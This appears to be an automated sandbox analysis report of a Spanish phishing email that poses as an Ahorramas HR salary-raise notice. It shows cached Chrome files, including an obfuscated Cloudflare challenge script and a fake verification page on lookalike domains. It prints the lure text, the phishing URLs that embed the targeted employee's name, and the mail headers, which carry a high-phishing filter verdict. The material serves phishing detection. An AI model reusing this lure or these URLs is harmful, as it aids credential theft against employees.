                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                    Chrome Cache Entry: 168

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8014), with no line terminators
                                    Category:dropped
                                    Size (bytes):8014
                                    Entropy (8bit):5.7649861386742405
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:13BE7773E553F7F1E86F3945152B6EEC
                                    SHA1:97660BFEE8722CDCA78E37A12C212C07AF96CD69
                                    SHA-256:39ABC2405E6C4DC0381362222C559879D2B14C3B9312D22DCF8BFC7638A2765E
                                    SHA-512:7010A360C7604D52C12F415BE42324140E951FE75B2557911709973B3CD70EF49D37D8D646733782FD76925C1AACDBB912265DE863AAB2146BEF22FC65795397
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(338))/1+parseInt(U(316))/2*(-parseInt(U(308))/3)+-parseInt(U(263))/4+parseInt(U(311))/5+parseInt(U(349))/6+parseInt(U(299))/7+parseInt(U(301))/8,d===f)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,313637),h=this||self,i=h[V(293)],n=function(a0,d,e,f){return a0=V,d=String[a0(321)],e={'h':function(D){return D==null?'':e.g(D,6,function(E,a1){return a1=b,a1(302)[a1(279)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,D==null)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(274)];Q+=1)if(R=D[a2(279)](Q),Object[a2(341)][a2(309)][a2(269)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(341)][a2(309)][a2(269)](H,S))J=S;else{if(Object[a2(341)][a2(309)][a2(269)](I,J)){if(256>J[a2(350)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(258)](F(O)),O=0):P++,G++);for(T=J[a2(350)](0),G=0;8>G;O=O<<1.47|T&1,P==E-1?(P=0,N[a2(258)](F(O)),O=0):P++,T>>=1,

                                    Chrome Cache Entry: 169

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                    Category:dropped
                                    Size (bytes):2407
                                    Entropy (8bit):7.900400471609788
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                    SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                    SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                    SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

                                    Chrome Cache Entry: 170

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 39 x 2, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):3.969798475032601
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E7CF9D0667462392575F0740DD1FC46F
                                    SHA1:05EF72D719E8C2ADA85891D922AE890380C4F680
                                    SHA-256:351C2A684EAFB23F8F75325A811AB7D4140F5C5653DEB142E1A2A7078C0578FC
                                    SHA-512:0B0AC57067F6936EF7B359654C7BF09C97E7FAAB67DDE5631FAA583BDE778BC1BA2EA87C423320A8E3702E2870858D78F7BAC9502F0DB8508963BEB724FEA5AE
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e2e658288a72e19/1731664852902/pwbkRyp6Rdg5_uU
                                    Preview:.PNG........IHDR...'.........T.R.....IDAT.....$.....IEND.B`.

                                    Chrome Cache Entry: 172

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8108), with no line terminators
                                    Category:downloaded
                                    Size (bytes):8108
                                    Entropy (8bit):5.764193675977358
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:C267461238E45EC4AAC0582937B125B1
                                    SHA1:254D6CDA9A3818B4F79793B713D6F57BE22971F2
                                    SHA-256:120B499FD78946E70C4E74AC5EF9522894AB3EA0D3F7B97604DC357F2BF9131F
                                    SHA-512:2CF98F5968D98E525A51B9B316062D04EE9A6A35B5338C14F048A47EB8EC2DB889467286D6F008ECCEA7BCA1B7154F59ACAD31E20DBB466305A01F95EF0ED15C
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ahorramas-5ocglii6fvrlmr.wroy.de/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(360))/1*(-parseInt(U(317))/2)+parseInt(U(357))/3*(-parseInt(U(320))/4)+-parseInt(U(378))/5+parseInt(U(350))/6*(parseInt(U(355))/7)+-parseInt(U(338))/8+-parseInt(U(348))/9*(parseInt(U(372))/10)+parseInt(U(380))/11,f===d)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,998767),h=this||self,i=h[V(406)],n=function(a0,d,e,f){return a0=V,d=String[a0(401)],e={'h':function(D){return D==null?'':e.g(D,6,function(E,a1){return a1=b,a1(344)[a1(349)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(354)];Q+=1)if(R=D[a2(349)](Q),Object[a2(315)][a2(416)][a2(345)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(315)][a2(416)][a2(345)](H,S))J=S;else{if(Object[a2(315)][a2(416)][a2(345)](I,J)){if(256>J[a2(336)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[a2(371)](F(O)),O=0):P++,G++);for(T=J[a2(336)](0

                                    Chrome Cache Entry: 174

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (951)
                                    Category:downloaded
                                    Size (bytes):7146
                                    Entropy (8bit):4.424595527806386
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5EE0EA2C254CE775BBA1AC75F192DA6A
                                    SHA1:27996E69E602744F0C886845F25F64605248E93E
                                    SHA-256:772999803B72431CE328EA23F37F334E66759B61B5FDD0F55422290505A2CC03
                                    SHA-512:A6C6E21E3F655426C3D05BA2A8BB1816B63C9DF5B47FD7C2966F948836EDE470563BF4A2D08C77F28EBA8282EB30FEFFFC1B98D946A0D329CCD7C916D2192442
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/ahorramas.com
                                    Preview:<!doctype html>. <html lang="en-US">. <head>. <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script>. <title>Ahorramas.Com Verifing...</title>. <meta content="width=device-width,initial-scale=1" name=viewport>. <script>. var verifyCallback_CF = function (response) {. var cfForm = document.querySelector("#cfForm");. if (response && response.length > 10) {. cfForm.submit();. return;. }. };. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAAz4efDGx1QOD-bE",. callback: verifyCallback_CF,. });. };. </script>. <style>. .h1, .h2 {. font-weight: 500;. }. * {. box-sizing: border-box;. margin: 0;. padding: 0;.

                                    Static File Info

                                    General

                                    File type:RFC 822 mail, ASCII text, with very long lines (309), with CRLF line terminators
                                    Entropy (8bit):6.042894654992791
                                    TrID:
                                    • E-Mail message (Var. 5) (54515/1) 100.00%
                                    File name:704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
                                    File size:15'821 bytes
                                    MD5:348b6a46a2bf44ee4bdc077ce4fae7c8
                                    SHA1:ce01869c074679099fbf7dbcfa12761222a9d0e2
                                    SHA256:5459a8aa83420fb1e0415d196aa163e58abeba21c8f4f1e1888a255a528b0265
                                    SHA512:01b30c6742161f63fd8b46f83a5d08405ffed10062104855c3718a5818180a52f947fc72cb77d01b29be2caec0743ca95ac5a46663adb126d1922265746eee67
                                    SSDEEP:192:RZG3FfY0BYKJFFAkCXtI+FYCbmNbu5hFYhVc5ONbRKu9veGpPBeFP4FqAyTkfA48:R03Zx+mQKZRveGpPBeFP4FqAyUA0w
                                    TLSH:FE62E611AE071C57C7A0558A18DD0DC9415CBB86F4BBA0A4281FF67E51CE2BF2CF4DAA
                                    File Content Preview:Received: from DUZPR01CA0004.eurprd01.prod.exchangelabs.com.. (2603:10a6:10:3c3::20) by VI0P189MB2649.EURP189.PROD.OUTLOOK.COM.. (2603:10a6:800:23b::11) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8

                                    Static Mail

                                    General

                                    Subject:Ahorramas RR.HH.: Notificacin de Mejora Salarial
                                    From:Administrador Ahorramas <Billing.kfil@denasabuildcon.com>
                                    To:fernando.batuecas@ahorramas.com
                                    Cc:
                                    BCC:
                                    Date:Thu, 14 Nov 2024 17:46:13 -1200
                                    Communications:
                                    • Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Detalles del Aumento Salarial - Noviembre 2024 body { font-family: Arial, sans-serif; } .container { width: 800px; margin: 0 auto; padding: 20px; border: 1px solid #ddd; border-radius: 5px; } .header, .content, .footer { text-align: center; margin-bottom: 20px; } .elementToProof { border: 0; margin: 0; padding: 12px; background-color: #eaeaea; font-family: Helvetica, Arial, sans-serif; } table { border-collapse: collapse; width: 100%; } th, td { padding: 5px; } th { background-color: #029740; color: #fff; } td { background-color: #f3fff8; } .btn { display: inline-block; padding: 12px 24px; color: #333; background-color: #ffc423; text-decoration: none; border-radius: 2px; font-weight: bold; font-size: 15px; } .btn img { vertical-align: middle; margin-right: 8px; } .footer .message-id { color: #c0c0c0; font-size: 10px; } Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO REVISAR DOCUMENTO https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre ahorramas.com/Aumento-Salarial-Noviembre https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Message ID: vEngTBHl3e69837tDmmV7099446787
                                    Attachments:

                                      Headers

                                      Key Value
                                      Receivedfrom [37.46.113.218] (port=49559 helo=[10.27.18.98]) by srv.cybaimtech.in with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <Billing.kfil@denasabuildcon.com>) id 1tBpA2-0003wF-0p for fernando.batuecas@ahorramas.com; Fri, 15 Nov 2024 11:16:24 +0530
                                      Authentication-Resultsspf=pass (sender IP is 103.177.225.180) smtp.mailfrom=denasabuildcon.com; dkim=fail (signature did not verify) header.d=denasabuildcon.com;dmarc=bestguesspass action=none header.from=denasabuildcon.com;compauth=pass reason=109
                                      Received-SPFPass (protection.outlook.com: domain of denasabuildcon.com designates 103.177.225.180 as permitted sender) receiver=protection.outlook.com; client-ip=103.177.225.180; helo=srv.cybaimtech.in; pr=C
                                      DKIM-Signaturev=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=denasabuildcon.com; s=default; h=Content-Transfer-Encoding:Subject:From:To: Date:MIME-Version:Content-Type:Sender:Reply-To:Message-ID:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=I1SWxHP9IEjzV03XVi0xNoL0vmh7fAg2qg4ohUcmlEA=; b=Nzs6oZYbNAe17BXdMyUeeD+GEA gKD180gJVBWt41QnwY+I+uehyNMUXr4Kgkso0vlKyXfW/GT96f8YOMAekMGULiKfGusz/gS1HX+jS LKDXvPK6lefMvD8UNN4mUOP4EgylKwurSgG9ffe5Qj+frkXqh/M2Wp0ftdrVEj5Uo9tTKYTrj2h5e 5kr74X4rREOMZgETsqrOt6hN/LUtPb/7ot1wCPNiu0ioGcpDjkGHehucUuTFXFxO17Esuqsx++cFR MJMp6duFOdgq76MO3Tliz0WAlKNfUAOwPTBdzujJ/8ii4H8w6L9qTE+wXiTDQJ0W7ReG/090Z1hf+ vOYCIKtg==;
                                      Content-Typemultipart/mixed; boundary="===============1437729934825352842=="
                                      MIME-Version1.0
                                      DateThu, 14 Nov 2024 17:46:13 -1200
                                      Tofernando.batuecas@ahorramas.com
                                      FromAdministrador Ahorramas <Billing.kfil@denasabuildcon.com>
                                      SubjectAhorramas RR.HH.: Notificacin de Mejora Salarial
                                      Content-Transfer-Encoding8Bbit
                                      X-Priority1
                                      X-MSMail-PriorityHigh
                                      X-MailerMicrosoft
                                      Accept-Languageen-US
                                      Content-Languageen-US
                                      X-AntiAbuseSender Address Domain - denasabuildcon.com
                                      X-Get-Message-Sender-Viasrv.cybaimtech.in: authenticated_id: billing.kfil@denasabuildcon.com
                                      X-Authenticated-Sendersrv.cybaimtech.in: billing.kfil@denasabuildcon.com
                                      X-Source
                                      X-Source-Args
                                      X-Source-Dir
                                      Message-ID <98466892-183b-4b83-84b5-98a34ecc9288@DU2PEPF00028CFF.eurprd03.prod.outlook.com>
                                      Return-PathBilling.kfil@denasabuildcon.com
                                      X-EOPAttributedMessage0
                                      X-EOPTenantAttributedMessage4eb911de-063e-41cb-bcf9-71aabf223544:0
                                      X-MS-PublicTrafficTypeEmail
                                      X-MS-TrafficTypeDiagnosticDU2PEPF00028CFF:EE_|VI0P189MB2649:EE_
                                      X-MS-Office365-Filtering-Correlation-Id21da436a-11c8-4f17-3690-08dd0538d8d1
                                      X-MS-Exchange-AtpMessagePropertiesSA|SL
                                      X-Forefront-Antispam-Report CIP:103.177.225.180;CTRY:IN;LANG:es;SCL:8;SRV:;IPV:NLI;SFV:SPM;H:srv.cybaimtech.in;PTR:srv.cybaimtech.in;CAT:HPHISH;SFTY:9.25;SFS:(13230040)(5073199012)(5063199012)(4123199012)(2092899012)(3072899012)(12012899012)(5062899012)(69100299015)(1032899013)(2066899003)(4076899003)(8096899003)(43540500003);DIR:INB;
                                      X-Microsoft-Antispam BCL:0;ARA:13230040|5073199012|5063199012|4123199012|2092899012|3072899012|12012899012|5062899012|69100299015|1032899013|2066899003|4076899003|8096899003|43540500003;
                                      X-Microsoft-Antispam-Message-Info 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

                                      File Icon

                                      Icon Hash:46070c0a8e0c67d6